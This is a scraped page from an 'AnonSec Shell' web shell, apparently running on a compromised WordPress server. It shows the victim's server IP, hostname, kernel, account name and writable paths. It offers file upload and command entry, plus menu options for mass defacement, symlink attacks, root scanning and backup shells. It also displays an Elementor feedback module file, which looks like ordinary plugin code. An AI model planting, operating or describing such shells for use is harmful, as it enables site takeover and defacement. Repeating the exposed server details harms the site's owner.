. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 3.13.122.42  /  Your IP : 216.73.217.101   [ Reverse IP ]
Web Server : Apache
System : Linux vmsrv01.metacllc.com 6.8.0-1031-aws #33~22.04.1-Ubuntu SMP Thu Jun 26 14:22:30 UTC 2025 x86_64
User : a1securityllc.com_5u5m69iigjb ( 10001)
PHP Version : 8.3.31
Disable Function : opcache_get_status
Domains : 5 Domains
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/a1securityllc.com/httpdocs/wp-content/plugins/elementor/modules/feedback/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/vhosts/a1securityllc.com/httpdocs/wp-content/plugins/elementor/modules/feedback/module.php
<?php

namespace Elementor\Modules\Feedback;

use Elementor\Core\Base\Module as Module_Base;
use Elementor\Modules\Feedback\Data\Controller;
use Elementor\Plugin;
use Elementor\Api;
use Elementor\Core\Common\Modules\Connect\Rest\Rest_Api;
use Elementor\Utils;
use http\Cookie as HttpCookie;
use WP_Http_Cookie;
use WpOrg\Requests\Cookie;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}

class Module extends Module_Base {

	public function __construct() {
		add_action( 'rest_api_init', fn() => self::register_routes() );
	}

	protected function register_routes() {
		register_rest_route( 'elementor/v1/feedback', '/submit', [
			'methods' => 'POST',
			'callback' => fn( $request ) => $this->handle_submit( $request ),
			'permission_callback' => '__return_true',
		] );
	}

	protected function handle_submit( $request, $additional_cookies = [] ) {
		$user_meta = get_user_meta( get_current_user_id(), 'wp_elementor_connect_common_data' );
		$app = Plugin::$instance->common->get_component( 'connect' )->get_app( 'feedback' );
		$body = [
			'title' => 'Editor Feedback',
			'description' => $request->get_param( 'description' ),
			'product' => 'EDITOR',
			'subject' => 'Editor Feedback',
		];

		$response = $app->submit( $body );
		$response_code = $response['response']['code'];
		if ( 'OK' === $response['response']['message'] ) {
			return [
				'success' => true,
				'code' => $response_code,
				'message' => esc_html__( 'Feedback submitted successfully.', 'elementor' ),
			];
		} else {
			$message = $response['data']['message'] ?? esc_html__( 'Failed to submit feedback.', 'elementor' );
			return [
				'success' => false,
				'code' => $response_code,
				'message' => $message,
			];
		}
	}
	/**
	 * Retrieve the module name.
	 *
	 * @return string
	 */
	public function get_name() {
		return 'feedback';
	}
}

Anon7 - 2022
AnonSec Team